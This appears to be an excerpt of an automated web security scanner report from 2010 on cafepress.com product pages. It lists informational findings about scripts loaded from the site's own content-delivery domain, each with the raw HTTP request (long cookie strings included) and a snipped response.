__utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 55145
Date: Sun, 26 Dec 2010 13:47:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css">
<script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"></script>
...[SNIP]...

5.62. http://www.cafepress.com/make/custom-stockings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-stockings

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/makedepts.js
http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js

Request

GET /make/custom-stockings HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 52596
Date: Sun, 26 Dec 2010 13:48:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 52596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css">
<script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"></script>
...[SNIP]...

5.63. http://www.cafepress.com/make/custom-t-shirts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-t-shirts

Issue detail

The response dynamically includes the following script from another domain:

http://content0.cpcache.com/js/hoverIntent.minified.js

Request

GET /make/custom-t-shirts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

5.64. http://www.cafepress.com/make/custom-thermos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-thermos

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/makedepts.js
http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js

Request

GET /make/custom-thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 55367
Date: Sun, 26 Dec 2010 13:47:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css">
<script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"></script>
...[SNIP]...

5.65. http://www.cafepress.com/make/custom-water-bottles previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-water-bottles

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/makedepts.js
http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js

Request

GET /make/custom-water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 58794
Date: Sun, 26 Dec 2010 13:47:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css">
<script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"></script>
...[SNIP]...

5.66. http://www.cafepress.com/make/holiday-invitations previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/holiday-invitations

Issue detail

The response dynamically includes the following script from another domain:

http://content0.cpcache.com/js/hoverIntent.minified.js

Request

GET /make/holiday-invitations HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

5.67. http://www.cafepress.com/make/holiday-photo-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/holiday-photo-cards

Issue detail

The response dynamically includes the following script from another domain:

http://content0.cpcache.com/js/hoverIntent.minified.js

Request

GET /make/holiday-photo-cards HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

5.68. http://www.cafepress.com/make/personalized-gifts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/personalized-gifts

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content8.cpcache.com/make/js/tracking-a.js

Request

GET /make/personalized-gifts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; 